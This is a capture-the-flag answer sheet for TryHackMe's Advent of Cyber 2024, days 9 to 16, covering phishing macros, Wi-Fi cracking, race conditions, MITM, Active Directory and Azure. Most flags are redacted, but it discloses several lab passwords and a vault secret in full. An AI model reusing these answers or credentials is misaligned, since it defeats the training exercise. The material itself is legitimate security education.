THM | AoC 2024 | Day 09-16
Summary:
From the ninth day until the sixteenth day of the Advent of Cyber event on the TryHackMe website.
General
Disclaimer: Please note that this write-up is NOT intended to replace the original room or its content, but rather serve as supplementary material for those who are stuck and need additional guidance. This walkthrough provides one (of the many) possible solution to the challenges, without revealing any flags or passwords directly.
Day-09
Title | Nine o'clock, make GRC fun, tell no one.
Questions & Answers
Question-1: What does GRC stand for?
Governance, Risk, and Compliance
Question-2: What is the flag you receive after performing the risk assessment?
<flag>
Question-3: If you enjoyed this task, feel free to check out the Risk Management room.
No answer needed
Day-10
Title | He had a brain full of macros, and had shells in his soul.
Learning Objectives
- Understand how phishing attacks work
- Discover how macros in documents can be used and abused
- Learn how to carry out a phishing attack with a macro
Questions & Answers
Question-1: What is the flag value inside the flag.txt file that’s located on the Administrator’s desktop?
<flag>
Question-2: If you enjoyed this task, feel free to check out the Phishing module.
No answer needed
Day-11
Title | If you'd like to WPA, press the star key!
Learning Objectives
- Understand what Wi-Fi is
- Explore its importance for an organisation
- Learn the different Wi-Fi attacks
- Learn about the WPA/WPA2 cracking attack
Questions & Answers
Question-1: What is the BSSID of our wireless interface?
02:00:00:00:02:00
Question-2: What is the SSID and BSSID of the access point? Format: SSID, BSSID
MalwareM_AP, 02:00:00:00:00:00
Question-3: What is the BSSID of the wireless interface that is already connected to the access point?
02:00:00:00:01:00
Question-4: What is the PSK after performing the WPA cracking attack?
<psk>
Question-5: If you enjoyed this task, feel free to check out the Networking module.
No answer needed
Day-12
Title | If I can’t steal their money, I’ll steal their joy!
Learning Objectives
- Understand the concept of race condition vulnerabilities
- Identify the gaps introduced by HTTP2
- Exploit race conditions in a controlled environment
- Learn how to fix the race
Questions & Answers
Question-1: What is the flag value after transferring over $2000 from Glitch's account?
<flag>
Question-2: If you enjoyed this task, feel free to check out the Race Conditions room!
No answer needed
Question-3: Where balances shift and numbers soar, look for an entry - an open door!
No answer needed
Day-13
Title | It came without buffering! It came without lag!
Learning Objectives
- Learn about WebSockets and their vulnerabilities.
- Learn how WebSocket Message Manipulation can be done.
Questions & Answers
Question-1: What is the value of Flag1?
<flag>
Question-2: What is the value of Flag2?
<flag>
Question-3: If you enjoyed this task, feel free to check out the Burp Suite module.
No answer needed
Day-14
Title | Even if we're horribly mismanaged, there'll be no sad faces on SOC-mas!
Learning Objectives
- Self-signed certificates
- Man-in-the-middle attacks
- Using Burp Suite proxy to intercept traffic
Questions & Answers
Question-1: What is the name of the CA that has signed the Gift Scheduler certificate?
THM
Question-2: Look inside the POST requests in the HTTP history. What is the password for the snowballelf account?
c4rrotn0s3
Question-3: Use the credentials for any of the elves to authenticate to the Gift Scheduler website. What is the flag shown on the elves’ scheduling page?
<flag>
Question-4: What is the password for Marta May Ware’s account?
H0llyJ0llySOCMAS!
Question-5: Mayor Malware finally succeeded in his evil intent: with Marta May Ware’s username and password, he can finally access the administrative console for the Gift Scheduler. G-Day is cancelled! What is the flag shown on the admin page?
<flag>
Question-6: If you enjoyed this task, feel free to check out the Burp Suite module.
No answer needed
Day-15
Title | Be it ever so heinous, there's no place like Domain Controller.
Learning Objectives
- Learn about the structures of Active Directory.
- Learn about common Active Directory attacks.
- Investigate a breach against an Active Directory.
Questions & Answers
Question-1: Use the "Security" tab within Event Viewer to answer questions 1 and 2.
No answer needed
Question-2: On what day was Glitch_Malware last logged in?
- Answer format: DD/MM/YYYY
07/11/2024
Question-3: What event ID shows the login of the Glitch_Malware user?
4624
Question-4: Read the PowerShell history of the Administrator account. What was the command that was used to enumerate Active Directory users?
Get-ADUser -Filter * -Properties MemberOf | Select-Object Name
Question-5: Look in the PowerShell log file located in Application and Services Logs -> Windows PowerShell. What was Glitch_Malware's set password?
<password>
Question-6: Review the Group Policy Objects present on the machine. What is the name of the installed GPO?
Malicious GPO - Glitch_Malware Persistence
Question-7: If you enjoyed this task, feel free to check out the Active Directory Hardening room.
No answer needed
Day-16
Title | The Wareville’s Key Vault grew three sizes that day.
Learning Objectives
- Learn about Azure, what it is and why it is used.
- Learn about Azure services like Azure Key Vault and Microsoft Entra ID.
- Learn how to interact with an Azure tenant using Azure Cloud Shell.
Questions & Answers
Question-1: What is the password for backupware that was leaked?
<password>
Question-2: What is the group ID of the Secret Recovery Group?
7d96660a-02e1-4112-9515-1762d0cb66b7
Question-3: What is the name of the vault secret?
aoc2024
Question-4: What are the contents of the secret stored in the vault?
WhereIsMyMind1999
Question-5: Liked today's task? Check the Exploiting Active Directory room to practice user and group enumeration in a similar yet different environment!
No answer needed